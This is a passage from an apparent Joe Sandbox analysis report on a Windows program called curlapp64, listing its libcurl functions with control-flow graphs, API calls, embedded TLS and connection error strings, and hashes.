                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$CriticalSection$closesocket$_errno_strdup$DeleteEnterInitializeLeavecallocmallocsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 941918121-0
                                                                                                                                • Opcode ID: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                                                                                • Instruction ID: dcfcf1c97cd82417ae0522866fcdde4f4d22130c9d71d1afe4af0a5dbce0c49a
                                                                                                                                • Opcode Fuzzy Hash: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                                                                                • Instruction Fuzzy Hash: 36813F2691AFC192E624DF25A85027A77B0FB98BA4F116335DB9E427A1DF3CF494C300
                                                                                                                                Function 00007FF8A93615D0 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 280libraryloaderCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1714 7ff8a93615d0-7ff8a936164d call 7ff8a9364a40 call 7ff8a9364a20 call 7ff8a935c700 1721 7ff8a936164f-7ff8a9361659 call 7ff8a9314b60 1714->1721 1722 7ff8a936165e-7ff8a9361662 1714->1722 1721->1722 1724 7ff8a93616ae 1722->1724 1725 7ff8a9361664-7ff8a9361684 GetModuleHandleW GetProcAddress 1722->1725 1727 7ff8a93616b0-7ff8a93616b7 1724->1727 1725->1724 1726 7ff8a9361686-7ff8a93616a8 call 7ff8a935c700 1725->1726 1726->1724 1735 7ff8a93616aa-7ff8a93616ac 1726->1735 1729 7ff8a93616b9-7ff8a93616bd 1727->1729 1730 7ff8a93616c3-7ff8a93616e5 call 7ff8a935c700 1727->1730 1729->1730 1732 7ff8a93616bf-7ff8a93616c1 1729->1732 1737 7ff8a9361a1c-7ff8a9361a2b call 7ff8a9314a70 1730->1737 1738 7ff8a93616eb 1730->1738 1736 7ff8a93616ed-7ff8a93616f8 1732->1736 1735->1727 1739 7ff8a93616fa-7ff8a936171b call 7ff8a9365af0 call 7ff8a93653d0 1736->1739 1740 7ff8a9361734-7ff8a936173a call 7ff8a9360380 1736->1740 1748 7ff8a9361a30-7ff8a9361a59 call 7ff8a9369e10 1737->1748 1738->1736 1755 7ff8a936171d-7ff8a9361724 1739->1755 1756 7ff8a9361727-7ff8a9361732 call 7ff8a9365b20 1739->1756 1746 7ff8a936173f-7ff8a9361745 1740->1746 1746->1748 1749 7ff8a936174b-7ff8a9361752 1746->1749 1750 7ff8a9361754 1749->1750 1751 7ff8a9361757-7ff8a936176a call 7ff8a93126d0 1749->1751 1750->1751 1760 7ff8a93618b9-7ff8a93618be 1751->1760 1761 7ff8a9361770-7ff8a9361774 1751->1761 1755->1756 1756->1740 1756->1761 1760->1748 1763 7ff8a9361785-7ff8a9361789 1761->1763 1764 7ff8a9361776-7ff8a9361780 call 7ff8a9314b60 1761->1764 1766 7ff8a936178f-7ff8a93617a9 call 7ff8a9364040 1763->1766 1767 7ff8a936183b-7ff8a9361852 1763->1767 1764->1763 1775 7ff8a93617ab-7ff8a93617bf call 7ff8a9314a70 1766->1775 1776 7ff8a93617c4-7ff8a9361839 memmove call 7ff8a935c980 call 7ff8a9364100 call 7ff8a9314b60 1766->1776 1768 7ff8a9361859-7ff8a9361885 1767->1768 1770 7ff8a936188e-7ff8a93618a8 calloc 1768->1770 1771 7ff8a9361887 1768->1771 1773 7ff8a93618aa-7ff8a93618b4 call 7ff8a9314a70 1770->1773 1774 7ff8a93618c3-7ff8a9361924 1770->1774 1771->1770 1773->1760 1784 7ff8a936199d-7ff8a93619bc call 7ff8a9308c60 1774->1784 1785 7ff8a9361926-7ff8a9361951 free call 7ff8a934e4c0 1774->1785 1775->1748 1776->1768 1791 7ff8a93619c1-7ff8a93619df 1784->1791 1792 7ff8a9361987-7ff8a9361998 call 7ff8a9314a70 1785->1792 1793 7ff8a9361953-7ff8a9361959 1785->1793 1799 7ff8a93619e1-7ff8a93619e4 1791->1799 1800 7ff8a9361a03-7ff8a9361a1a call 7ff8a9314a70 1791->1800 1792->1748 1796 7ff8a936195b-7ff8a936196c call 7ff8a9314a70 1793->1796 1797 7ff8a9361971-7ff8a9361982 call 7ff8a9314a70 1793->1797 1796->1748 1797->1748 1799->1800 1804 7ff8a93619e6-7ff8a9361a01 1799->1804 1800->1748 1804->1748
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                                                                                • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                                                                                • API String ID: 3185706071-3097429119
                                                                                                                                • Opcode ID: a52d66d13fdc765c885817b29b88e3915811eda22c520c87c4d16df4b62a9c4f
                                                                                                                                • Instruction ID: c42298f3b8ddff684f770cd8383e843ec15e26221e1b19aa70b7d5134e5ad828
                                                                                                                                • Opcode Fuzzy Hash: a52d66d13fdc765c885817b29b88e3915811eda22c520c87c4d16df4b62a9c4f
                                                                                                                                • Instruction Fuzzy Hash: 0DD17576A0EB81AAEB109F65E4802AA67B4FB447C8F106035DB4D87BA5DF3CE555CB00
                                                                                                                                Function 00007FF8A9358E00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 137stringCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1856 7ff8a9358e00-7ff8a9358e3d call 7ff8a930cfb0 1859 7ff8a9358f9d-7ff8a9358fc2 calloc 1856->1859 1860 7ff8a9358e43-7ff8a9358e4a 1856->1860 1861 7ff8a9358fcb-7ff8a9358fe9 call 7ff8a9311b60 1859->1861 1862 7ff8a9358fc4-7ff8a9358fc9 1859->1862 1863 7ff8a9358e4c-7ff8a9358e56 1860->1863 1864 7ff8a9358ea6-7ff8a9358ec1 1860->1864 1875 7ff8a9358feb-7ff8a9358ff2 1861->1875 1876 7ff8a9359026-7ff8a935902e 1861->1876 1865 7ff8a9359034-7ff8a935904c 1862->1865 1867 7ff8a9358e58-7ff8a9358e6d strncmp 1863->1867 1868 7ff8a9358e80-7ff8a9358e87 1863->1868 1869 7ff8a9358ecb 1864->1869 1870 7ff8a9358ec3-7ff8a9358ec9 1864->1870 1867->1868 1872 7ff8a9358e6f-7ff8a9358e7a 1867->1872 1868->1864 1873 7ff8a9358e89-7ff8a9358ea4 1868->1873 1874 7ff8a9358ed1 1869->1874 1870->1874 1872->1859 1872->1868 1877 7ff8a9358ed7-7ff8a9358eed _strdup 1873->1877 1874->1877 1878 7ff8a9358ff4-7ff8a9359001 call 7ff8a9314a70 1875->1878 1879 7ff8a9359006-7ff8a9359024 free 1875->1879 1880 7ff8a9359032 1876->1880 1877->1862 1881 7ff8a9358ef3-7ff8a9358f09 call 7ff8a9324fc0 1877->1881 1878->1879 1879->1865 1880->1865 1884 7ff8a9358f0e-7ff8a9358f11 1881->1884 1885 7ff8a9358f1b-7ff8a9358f1e 1884->1885 1886 7ff8a9358f13-7ff8a9358f16 1884->1886 1887 7ff8a9358f20-7ff8a9358f6d call 7ff8a9353b60 call 7ff8a9353bf0 call 7ff8a9314a70 1885->1887 1888 7ff8a9358f72-7ff8a9358f77 1885->1888 1886->1880 1887->1865 1888->1880 1890 7ff8a9358f7d-7ff8a9358f98 call 7ff8a9314a70 1888->1890 1890->1865
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _strdupcallocfreestrncmp
                                                                                                                                • String ID: Could not resolve %s: %s$Failed to resolve %s '%s' with timeout after %lld ms$Unix socket path too long: '%s'$anonymous$host$localhost/$proxy
                                                                                                                                • API String ID: 2270677362-4063513385
                                                                                                                                • Opcode ID: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                                                                                • Instruction ID: 197dccb1d4fe9b967a0feeaafa5bba90a4305f556b275881478918b7362a0d3a
                                                                                                                                • Opcode Fuzzy Hash: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                                                                                • Instruction Fuzzy Hash: 5B51A021A0EEC2AAFB618F2594403B923B1EB49BC8F446035DE4D8B795EF7DE585C740
                                                                                                                                Function 00007FF8A930D570 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 487COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1898 7ff8a930d570-7ff8a930d5c8 1899 7ff8a930d5d0-7ff8a930d5f7 call 7ff8a9353b60 1898->1899 1902 7ff8a930d600-7ff8a930d606 1899->1902 1903 7ff8a930d60c-7ff8a930d610 1902->1903 1904 7ff8a930d851-7ff8a930d868 1902->1904 1903->1904 1905 7ff8a930d616-7ff8a930d61a 1903->1905 1904->1902 1906 7ff8a930d86e 1904->1906 1907 7ff8a930d61c-7ff8a930d621 1905->1907 1908 7ff8a930d626-7ff8a930d631 1905->1908 1909 7ff8a930d872-7ff8a930d875 1906->1909 1907->1904 1910 7ff8a930d6ab-7ff8a930d6d6 call 7ff8a9314bb0 1908->1910 1911 7ff8a930d633-7ff8a930d635 1908->1911 1912 7ff8a930d87b-7ff8a930d882 1909->1912 1913 7ff8a930dcf2 1909->1913 1928 7ff8a930d6f8-7ff8a930d6fc 1910->1928 1929 7ff8a930d6d8-7ff8a930d6db 1910->1929 1911->1910 1915 7ff8a930d637-7ff8a930d644 call 7ff8a9308860 1911->1915 1917 7ff8a930d88d-7ff8a930d897 1912->1917 1918 7ff8a930d884-7ff8a930d887 1912->1918 1916 7ff8a930dcf6 1913->1916 1930 7ff8a930d649-7ff8a930d64e 1915->1930 1924 7ff8a930dcf8-7ff8a930dd1a 1916->1924 1920 7ff8a930d899-7ff8a930d8c6 call 7ff8a9353bf0 1917->1920 1921 7ff8a930d8ca-7ff8a930d908 call 7ff8a9353bf0 1917->1921 1918->1917 1919 7ff8a930dbb1-7ff8a930dbc3 call 7ff8a9314bb0 1918->1919 1940 7ff8a930dbc7-7ff8a930dbcd 1919->1940 1920->1921 1941 7ff8a930d90a-7ff8a930d911 1921->1941 1942 7ff8a930d914-7ff8a930d917 1921->1942 1938 7ff8a930d84e 1928->1938 1939 7ff8a930d702-7ff8a930d707 1928->1939 1934 7ff8a930da31-7ff8a930da48 1929->1934 1935 7ff8a930d6e1-7ff8a930d6e8 1929->1935 1936 7ff8a930d6ed-7ff8a930d6f0 1930->1936 1937 7ff8a930d654-7ff8a930d657 1930->1937 1934->1909 1935->1938 1936->1910 1943 7ff8a930d6f2-7ff8a930d6f6 1936->1943 1944 7ff8a930d659-7ff8a930d65f 1937->1944 1945 7ff8a930d661-7ff8a930d682 call 7ff8a9353bf0 1937->1945 1938->1904 1946 7ff8a930d718-7ff8a930d722 1939->1946 1947 7ff8a930d709-7ff8a930d712 WSASetLastError 1939->1947 1948 7ff8a930dbcf-7ff8a930dbf7 call 7ff8a9314bb0 1940->1948 1949 7ff8a930dc00-7ff8a930dc0b 1940->1949 1941->1942 1950 7ff8a930dcbc-7ff8a930dcf0 call 7ff8a9353bf0 call 7ff8a9314a70 1942->1950 1951 7ff8a930d91d-7ff8a930d920 1942->1951 1943->1910 1944->1910 1963 7ff8a930d684-7ff8a930d6a0 call 7ff8a9314b60 1945->1963 1964 7ff8a930d6a7 1945->1964 1953 7ff8a930d724-7ff8a930d751 call 7ff8a9353bf0 1946->1953 1954 7ff8a930d755-7ff8a930d795 call 7ff8a9353bf0 1946->1954 1947->1946 1948->1949 1978 7ff8a930dbf9-7ff8a930dbfe 1948->1978 1949->1940 1958 7ff8a930dc0d 1949->1958 1950->1924 1960 7ff8a930dba0-7ff8a930dba3 1951->1960 1961 7ff8a930d926-7ff8a930d933 1951->1961 1953->1954 1976 7ff8a930d7a1-7ff8a930d7a5 1954->1976 1977 7ff8a930d797-7ff8a930d79e 1954->1977 1968 7ff8a930dc13-7ff8a930dc1f 1958->1968 1960->1919 1972 7ff8a930dba5-7ff8a930dbac 1960->1972 1970 7ff8a930d939-7ff8a930d93d 1961->1970 1971 7ff8a930da6b-7ff8a930da76 1961->1971 1963->1964 1964->1910 1979 7ff8a930dc2f-7ff8a930dc37 1968->1979 1980 7ff8a930dc21-7ff8a930dc28 1968->1980 1970->1971 1982 7ff8a930d943-7ff8a930d94a 1970->1982 1974 7ff8a930db8b-7ff8a930db96 1971->1974 1975 7ff8a930da7c-7ff8a930da80 1971->1975 1972->1916 1974->1899 1989 7ff8a930db9c 1974->1989 1975->1974 1984 7ff8a930da86-7ff8a930da8d 1975->1984 1985 7ff8a930d7f4-7ff8a930d802 1976->1985 1986 7ff8a930d7a7-7ff8a930d7ae 1976->1986 1977->1976 1978->1949 1987 7ff8a930dc2a-7ff8a930dc2d 1978->1987 1991 7ff8a930dc39-7ff8a930dc40 1979->1991 1992 7ff8a930dc42-7ff8a930dc4a 1979->1992 1988 7ff8a930dc59-7ff8a930dcba call 7ff8a934ee20 call 7ff8a9353bf0 call 7ff8a9314a70 1980->1988 1993 7ff8a930d94c-7ff8a930d950 1982->1993 1994 7ff8a930d952-7ff8a930d974 call 7ff8a9353bf0 1982->1994 1997 7ff8a930da8f-7ff8a930da93 1984->1997 1998 7ff8a930da95-7ff8a930dab3 call 7ff8a9353bf0 1984->1998 1995 7ff8a930d806-7ff8a930d813 1985->1995 1999 7ff8a930d7b0-7ff8a930d7b7 1986->1999 2000 7ff8a930d7c7-7ff8a930d7cf 1986->2000 1987->1968 1988->1924 1989->1960 1991->1988 2002 7ff8a930dc4c-7ff8a930dc53 1992->2002 2003 7ff8a930dc55 1992->2003 1993->1994 2001 7ff8a930d97a-7ff8a930d984 1993->2001 1994->1971 1994->2001 2006 7ff8a930d823-7ff8a930d841 call 7ff8a9314bb0 call 7ff8a93374f0 1995->2006 2007 7ff8a930d815-7ff8a930d821 call 7ff8a9314bb0 1995->2007 1997->1998 2011 7ff8a930dab9-7ff8a930dac3 1997->2011 1998->1974 1998->2011 1999->2000 2013 7ff8a930d7b9-7ff8a930d7bf 1999->2013 2014 7ff8a930d7e1-7ff8a930d7f2 call 7ff8a930d0d0 2000->2014 2015 7ff8a930d7d1-7ff8a930d7dd 2000->2015 2008 7ff8a930d986-7ff8a930d9b3 call 7ff8a9353bf0 2001->2008 2009 7ff8a930d9b7-7ff8a930d9f7 call 7ff8a9353bf0 2001->2009 2002->1988 2003->1988 2035 7ff8a930d846-7ff8a930d84a 2006->2035 2007->2035 2008->2009 2038 7ff8a930d9f9-7ff8a930da00 2009->2038 2039 7ff8a930da03-7ff8a930da21 call 7ff8a930d0d0 2009->2039 2023 7ff8a930dac5-7ff8a930daf2 call 7ff8a9353bf0 2011->2023 2024 7ff8a930daf6-7ff8a930db36 call 7ff8a9353bf0 2011->2024 2013->1999 2022 7ff8a930d7c1-7ff8a930d7c5 2013->2022 2014->1995 2015->2014 2022->2014 2023->2024 2041 7ff8a930db38-7ff8a930db3f 2024->2041 2042 7ff8a930db42-7ff8a930db60 call 7ff8a930d0d0 2024->2042 2035->1938 2038->2039 2048 7ff8a930da4d-7ff8a930da65 call 7ff8a9314bb0 2039->2048 2049 7ff8a930da23-7ff8a930da2f call 7ff8a9314bb0 2039->2049 2041->2042 2051 7ff8a930db70-7ff8a930db88 call 7ff8a9314bb0 2042->2051 2052 7ff8a930db62-7ff8a930db6e call 7ff8a9314bb0 2042->2052 2048->1971 2049->1971 2051->1974 2052->1974
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CounterPerformanceQuery
                                                                                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                                                                                • API String ID: 2783962273-3359130258
                                                                                                                                • Opcode ID: 4805842a6ab7445c0055ab157f99b99f5c6fe9f3cf4175bfadef8ec2628820d0
                                                                                                                                • Instruction ID: 432b97f21350e57e19c34bf0296a12e887ba4a807c454249dcd2f7c66567cc62
                                                                                                                                • Opcode Fuzzy Hash: 4805842a6ab7445c0055ab157f99b99f5c6fe9f3cf4175bfadef8ec2628820d0
                                                                                                                                • Instruction Fuzzy Hash: 1732A022B0DBC5AAFB118FA894012BC37F1FB04B98F046275DE6D97A99DF38A551C340
                                                                                                                                Function 00007FF6CABB5860 Relevance: 15.2, APIs: 10, Instructions: 182COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB58BA
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB58CF
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB58E2
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB58F6
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB590A
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB5965
                                                                                                                                • curl_easy_setopt.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB59B5
                                                                                                                                • curl_easy_perform.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB59BE
                                                                                                                                • curl_easy_strerror.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,00007FF6CABB4DB6), ref: 00007FF6CABB59CE
                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CABB5ACE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: curl_easy_setopt$_invalid_parameter_noinfo_noreturncurl_easy_performcurl_easy_strerror
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 496898497-0
                                                                                                                                • Opcode ID: 2b8b2e808e1c965a009366a61660bc5d1e6316d1fd7c01ec76144b79d3684a5a
                                                                                                                                • Instruction ID: 4df273d570089b3b61dbf142c36404eb7d7fc26e945bb0482e7e345730f2b0bf
                                                                                                                                • Opcode Fuzzy Hash: 2b8b2e808e1c965a009366a61660bc5d1e6316d1fd7c01ec76144b79d3684a5a
                                                                                                                                • Instruction Fuzzy Hash: 1F71FE62E0878582EA108F25F5A43796361FB86BA1F045371DAEE82BE1CF7CE485C701
                                                                                                                                Function 00007FF8A9342110 Relevance: 13.7, APIs: 9, Instructions: 247networksleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$Sleep$select
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2442476585-0
                                                                                                                                • Opcode ID: db324bb6ee2e556e08998bc156a60d69185baaaaf9b3885c571f797cb652de86
                                                                                                                                • Instruction ID: b6bf81a7360e805d36129cdc4eb97e744ed27d573cc2b2191778eaec61826755
                                                                                                                                • Opcode Fuzzy Hash: db324bb6ee2e556e08998bc156a60d69185baaaaf9b3885c571f797cb652de86
                                                                                                                                • Instruction Fuzzy Hash: 3EA1D625B0EEC296EB694F25980427962B5FF84BE5F12A234DA1DB77D4CF3D9940C700
                                                                                                                                Function 00007FF8A9305EA0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$connect
                                                                                                                                • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                                                                                • API String ID: 375857812-3816509080
                                                                                                                                • Opcode ID: 8f4ee6bd23935d29add6c52651923b68a1b2833105ba367e3117df76f45cd4ce
                                                                                                                                • Instruction ID: b0cae3ad746e394eef4f76289886b97d393a3931d08d647bcdea1732c4cd74fa
                                                                                                                                • Opcode Fuzzy Hash: 8f4ee6bd23935d29add6c52651923b68a1b2833105ba367e3117df76f45cd4ce
                                                                                                                                • Instruction Fuzzy Hash: 4F61A261A0EEC6A5EB109F6698003F93770EB45BE8F046271DE6D8B7DADE6CE445C340
                                                                                                                                Function 00007FF8A9302940 Relevance: 12.1, APIs: 8, Instructions: 67networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalErrorLastSection$Leavefreememmove$Enterfreeaddrinfogetaddrinfomallocsend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3198214216-0
                                                                                                                                • Opcode ID: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                • Instruction ID: 567c0bcbf22b47c0b9767e1afee97e64fe51e33025008b4619aebfa0a27e5367
                                                                                                                                • Opcode Fuzzy Hash: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                • Instruction Fuzzy Hash: 9F318F32A0DE82A6E7508F65E85026A73B0FB44BD8F546236DA5EC76A4CF3CD485C740
                                                                                                                                Function 00007FF8A935F250 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 175COMMON
